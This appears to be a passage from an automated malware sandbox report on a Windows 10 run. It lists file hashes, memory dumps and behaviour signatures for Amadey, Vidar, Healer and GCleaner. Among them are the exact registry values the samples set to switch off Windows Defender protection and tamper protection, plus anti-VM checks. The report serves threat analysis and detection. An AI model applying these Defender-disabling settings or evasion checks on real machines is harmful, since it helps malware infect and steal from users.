| SHA1 | 112403a17dd69d5b9018b8cede023cb3b54eab7d |
| SHA256 | b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec |
| SHA512 | bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58 |
memory/2876-389-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2680-388-0x0000000000FE0000-0x00000000014B0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe
| MD5 | 41e7a544f14c8eeda7675b6f8fc2f267 |
| SHA1 | 98585d0462f44ace4216e00c0ae33f7b3606e0d4 |
| SHA256 | b5d4798fed8196e12260f2152245af80763fe877d807069d7f0ca08fd4ee6843 |
| SHA512 | 6457c3a40dc56b82cf6eabb95d4591eab45aca0fff0bfeb03e20cc25a250b411cef072833bca7c1f58590bad4b10327bb364c1163896f0b2aaab6fde57a8e9ef |
memory/2680-412-0x0000000006710000-0x0000000006A3E000-memory.dmp
memory/1368-415-0x0000000000DC0000-0x00000000010EE000-memory.dmp
memory/2680-413-0x0000000006710000-0x0000000006A3E000-memory.dmp
memory/1452-433-0x0000000001270000-0x00000000016C2000-memory.dmp
memory/1368-432-0x0000000000DC0000-0x00000000010EE000-memory.dmp
memory/1368-431-0x0000000006DF0000-0x000000000711E000-memory.dmp
memory/1228-437-0x0000000000EB0000-0x00000000011DE000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
memory/1652-477-0x0000000006660000-0x0000000006980000-memory.dmp
memory/2680-479-0x0000000006710000-0x0000000006A3E000-memory.dmp
memory/3124-478-0x0000000000E00000-0x0000000001120000-memory.dmp
\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
| MD5 | d433e1dc943e6ea29d67cf72d2f6fecd |
| SHA1 | 9964aa3e596d93673c4d84695dc94d6f1a9766cd |
| SHA256 | a4c8487df15d27bad7699778b81dd6569c0b0e759bd0017f399b39cfa53bd1c5 |
| SHA512 | caab39684638d71e901b2915313c618baba27c015b0fc52c7503eb714dd4f9068bfadd30cd2d3e240ec925b003e9535e12ffdd5db3a610fcd056032ea925ca43 |
memory/1652-476-0x0000000006660000-0x0000000006980000-memory.dmp
memory/3124-501-0x0000000000E00000-0x0000000001120000-memory.dmp
memory/2680-524-0x0000000006710000-0x0000000006A3E000-memory.dmp
memory/1452-537-0x0000000001270000-0x00000000016C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe
| MD5 | 49a690607e1d76e6970b724c4fd22ec7 |
| SHA1 | 4b670fc77c181e9afb3986729ee3b585bc460c3f |
| SHA256 | 0d7d5c2d601ffd78f5714d6149aef687e5edefcaf88bb9d2d529e69233220ef7 |
| SHA512 | 54ae94f0bddeeef34e9c5cb1f9bebde49085807e0bb71015bac171ec9b73649ee85a799194ad9861da8221948e0e0e12d74346ad602d47e3d7781100f75d5f5b |
memory/2680-584-0x00000000060D0000-0x00000000063CF000-memory.dmp
memory/1228-586-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/3780-589-0x00000000013C0000-0x00000000016BF000-memory.dmp
memory/2680-588-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2680-587-0x00000000060D0000-0x00000000063CF000-memory.dmp
memory/2876-611-0x0000000000400000-0x000000000086A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
| MD5 | bd6a9d5ffd2bad77a792a14ab8f2775f |
| SHA1 | 9494a453e67cce126bbad031b33325e17deaf374 |
| SHA256 | f610afd2849e89b2b04d2bdca5b33211be65081e94a5207cc51e4e0cb1c0d498 |
| SHA512 | 6cd104bf357c61374dde38dce2664a8101b051a9ba47379b762290022a20bbfe00d4f99e2a1d685f81718305b3b6c63fd70d20d46bc1963b737fb6d1ed7efc42 |
C:\Users\Admin\AppData\Local\Temp\1091742001\b0c35556ec.exe
| MD5 | 1b7c22a214949975556626d7217e9a39 |
| SHA1 | d01c97e2944166ed23e47e4a62ff471ab8fa031f |
| SHA256 | 340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87 |
| SHA512 | ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5 |
\Users\Admin\AppData\Local\Temp\10000370101\inet.exe
| MD5 | 9d6f03d5a83f9ab0de52c69257720122 |
| SHA1 | 407ce825de553f856059543cb20c2002f4b2b87d |
| SHA256 | ab2c3bb1cf80ccd63b4e1be5b2aef4564542465e90f14e5110775658c6b7b9c6 |
| SHA512 | d937cb2599dd9a245e186a3f3d0efb786f9fbf5084c14878448f7454f175dc076d9af526a0f5ae24f75370247c70ae6e4f310d6d610f6ed4fdb2877b9c9468db |
memory/1228-652-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1228-654-0x0000000006E30000-0x0000000007290000-memory.dmp
memory/1188-656-0x0000000000400000-0x0000000000860000-memory.dmp
memory/1228-653-0x0000000006E30000-0x0000000007290000-memory.dmp
memory/3780-670-0x00000000013C0000-0x00000000016BF000-memory.dmp
memory/2680-702-0x00000000060D0000-0x00000000063CF000-memory.dmp
memory/2680-721-0x00000000060D0000-0x00000000063CF000-memory.dmp
memory/2680-722-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2876-723-0x0000000000400000-0x000000000086A000-memory.dmp
memory/1228-724-0x0000000006E30000-0x0000000007290000-memory.dmp
memory/1228-725-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1188-727-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2592-730-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Windows\Tasks\Test Task17.job
| MD5 | 738b0ee088c4454612ca08bd68ff3db8 |
| SHA1 | af6ed558fc5daebccb1e4fa96cbaab2867ed8920 |
| SHA256 | caf2043f1d8c51b1c2a16dc58552bb6e73a8794d0d24b0389716313ae52c12b0 |
| SHA512 | 50f608b38e8975d97dfc389d297a9615beada8fd2a43f7a9053d9f142dd292fef49f873d44b51952deea566b2f05fb8d69b5557c150f45af5e18ca2f583d53b5 |
C:\Users\Admin\AppData\Local\Temp\1091744001\ada8778c42.exe
| MD5 | cf6bd1302ab35c1275fedadbabde12fa |
| SHA1 | 0b8f58dd6cc533ae2ac26abf9eac849962cbfeb1 |
| SHA256 | 14738b35a925299846ccbaaae1e5002ad3eb4b63af8d08f517a8f916c99902e7 |
| SHA512 | c29182f551fe1538eddbb3b1f946073db2feabcfbe23729fbf8d6f72d3079a38f746af9cfa4f6db68d31bed038105a76a3dd381ce70cde5d181ebada16cc1b04 |
memory/2680-764-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2876-783-0x0000000000400000-0x000000000086A000-memory.dmp
memory/2876-805-0x0000000000400000-0x000000000086A000-memory.dmp
memory/1228-806-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1188-807-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2592-808-0x0000000000400000-0x0000000000860000-memory.dmp
memory/1644-809-0x0000000000910000-0x0000000001554000-memory.dmp
memory/2444-810-0x0000000000400000-0x000000000042F000-memory.dmp
memory/2444-812-0x0000000000400000-0x000000000042F000-memory.dmp
memory/1644-811-0x0000000000910000-0x0000000001554000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1091745001\6ab70434ce.exe
| MD5 | 639af76cb7333cbd609da5d52a6e195b |
| SHA1 | a1c8a3e99f11c72f0dcdfd75b75d6dbe9f266483 |
| SHA256 | a6e9b84cd1cdf3312a57f425bce1a490195864c5fae5ba5b0873c729ebbe11a8 |
| SHA512 | 67510ef5a9dfa0d1dbf38d87a8f7b92b1dcd9e3979fc4632a19830875c5a86fa7261f8d11e86b506ebf7621352dc69093fb1a0e3432aa25118a1d6240c66de51 |
memory/2680-826-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/2444-830-0x0000000010000000-0x000000001001C000-memory.dmp
memory/1228-834-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1188-836-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2592-837-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\7CNUR30T\service[1].htm
| MD5 | cfcd208495d565ef66e7dff9f98764da |
| SHA1 | b6589fc6ab0dc82cf12099d1c2d40ab994e8410c |
| SHA256 | 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9 |
| SHA512 | 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99 |
C:\Users\Admin\AppData\Local\Temp\1091746001\4c45c2eaab.exe
| MD5 | 75dd7a91559a030b7c608e32474413d0 |
| SHA1 | a2f27e1caa02eda2e33577e530b9538b31ac6626 |
| SHA256 | d4ad9f72eb0ec01c9b73ad3a798c19496d639ab67dc963acf1cfc8e59b869f95 |
| SHA512 | a98b44e762d26050be8cd11fd2bc7609f8ac5cadf36bdb49b3c205ed30b1dfc2c77a59da6472a06766d629db0c283728bad6ff8a6d24a3c5dda6ba5b0888fdc5 |
memory/3492-855-0x0000000000360000-0x0000000000D98000-memory.dmp
memory/2680-854-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/624-858-0x0000000000400000-0x000000000042F000-memory.dmp
memory/3492-857-0x0000000000360000-0x0000000000D98000-memory.dmp
memory/2908-860-0x0000000000AA0000-0x0000000000DA8000-memory.dmp
memory/1228-863-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1188-864-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2592-871-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2680-877-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/1228-881-0x0000000000EB0000-0x00000000011DE000-memory.dmp
memory/1188-882-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2592-884-0x0000000000400000-0x0000000000860000-memory.dmp
memory/2680-894-0x0000000000FE0000-0x00000000014B0000-memory.dmp
memory/1188-902-0x0000000000400000-0x0000000000860000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\EOYL2MRI\soft[1]
| MD5 | f49d1aaae28b92052e997480c504aa3b |
| SHA1 | a422f6403847405cee6068f3394bb151d8591fb5 |
| SHA256 | 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0 |
| SHA512 | 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773 |
C:\Users\Admin\AppData\Local\Temp\1091747001\9390d52627.exe
| MD5 | db3632ef37d9e27dfa2fd76f320540ca |
| SHA1 | f894b26a6910e1eb53b1891c651754a2b28ddd86 |
| SHA256 | 0513f12c182a105759497d8280f1c06800a8ff07e1d69341268f3c08ecc27c6d |
| SHA512 | 4490b25598707577f0b1ba1f0fbe52556f752b591c433117d0f94ce386e86e101527b3d1f9982d6e097e1fcb724325fdd1837cc51d94c6b5704fd8df244648fd |
C:\Users\Admin\AppData\Local\Temp\1091749001\2d2018b2b5.exe
| MD5 | f071beebff0bcff843395dc61a8d53c8 |
| SHA1 | 82444a2bba58b07cb8e74a28b4b0f715500749b2 |
| SHA256 | 0d89d83e0840155d3a4ceca1d514e92d9af14074be53abc541f80b6af3b0ceec |
| SHA512 | 1ac92897a11dbd3bd13b76bfeb2c8941fdffa7f33bc9e4db7781061fb684bfe8b8d19c21a22b3b551987f871c047b7518091b31fc743757d8f235c88628d121d |
Analysis: behavioral2
Detonation Overview
Submitted
2025-02-24 13:24
Reported
2025-02-24 13:26
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Amadey
Amadey family
Detect Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer, an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
Modifies Windows Defender TamperProtection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
Vidar
Vidar family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091756001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091746001\246e4bf32c.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091752001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091755001\Hdn6gzf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091744001\05e8de4ea8.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091759001\3c485884af.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091723001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091754001\GKjci28.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091760001\759b6f5ccf.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091745001\cc589b0c9e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\97ff6d62d89db8bc6052b771e0d7ca15601461b7ef746b0638db058812e56cb2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091674001\lFlj2tl.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempDDASRGUECZSW6AGGA2UAIBRH5YSXCHHW.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1091695001\NthMhDa.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
